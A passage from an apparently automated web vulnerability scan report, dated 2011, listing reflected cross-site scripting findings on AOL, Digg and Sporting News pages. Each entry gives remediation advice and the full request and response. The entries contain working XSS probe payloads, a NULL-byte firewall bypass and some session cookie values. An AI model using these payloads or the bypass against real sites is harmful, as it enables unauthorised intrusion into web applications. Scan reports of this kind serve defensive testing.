s_265.prop12="http://dev.aol.com/themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67568"-alert(1)-"863d34e5ea4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:11:01 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:11:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
aolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.82. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b2815"><script>alert(1)</script>03c666340fe was submitted in the REST URL parameter 1. This input was echoed as b2815"><script>alert(1)</script>03c666340fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%00b2815"><script>alert(1)</script>03c666340fe HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Fri, 06-May-2011 10:53:04 GMT; path=/; domain=digg.com
Set-Cookie: d=d50133d15ecf2dcd7ba69de08580494f90965e3d73b97e5fa32ac2711cba5273; expires=Tue, 04-May-2021 21:00:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=600466 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%00b2815"><script>alert(1)</script>03c666340fe.rss">
...[SNIP]...

5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/free

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbae5"%3b7b2f70e4cdd was submitted in the REST URL parameter 1. This input was echoed as bbae5";7b2f70e4cdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseballbbae5"%3b7b2f70e4cdd/free HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseballbbae5";7b2f70e4cdd:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseballbbae5";7b2f70e4cdd:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/free

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bb6"%3bc5e8272f943 was submitted in the REST URL parameter 2. This input was echoed as 93bb6";c5e8272f943 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/free93bb6"%3bc5e8272f943 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13083

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:free93bb6";c5e8272f943:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:free93bb6";c5e8272f943:error";
s_265.prop12=document.URL.split('?')[0];
...[SNIP]...

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/promo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8bc"%3b5944e8d17f4 was submitted in the REST URL parameter 1. This input was echoed as 3b8bc";5944e8d17f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball3b8bc"%3b5944e8d17f4/promo HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball3b8bc";5944e8d17f4:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseball3b8bc";5944e8d17f4:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/promo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ed8"%3b39d6845c6c7 was submitted in the REST URL parameter 2. This input was echoed as 14ed8";39d6845c6c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/promo14ed8"%3b39d6845c6c7 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13088

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:promo14ed8";39d6845c6c7:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:promo14ed8";39d6845c6c7:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/rankings

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193e1"%3b34ee4aa9b68 was submitted in the REST URL parameter 1. This input was echoed as 193e1";34ee4aa9b68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball193e1"%3b34ee4aa9b68/rankings HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response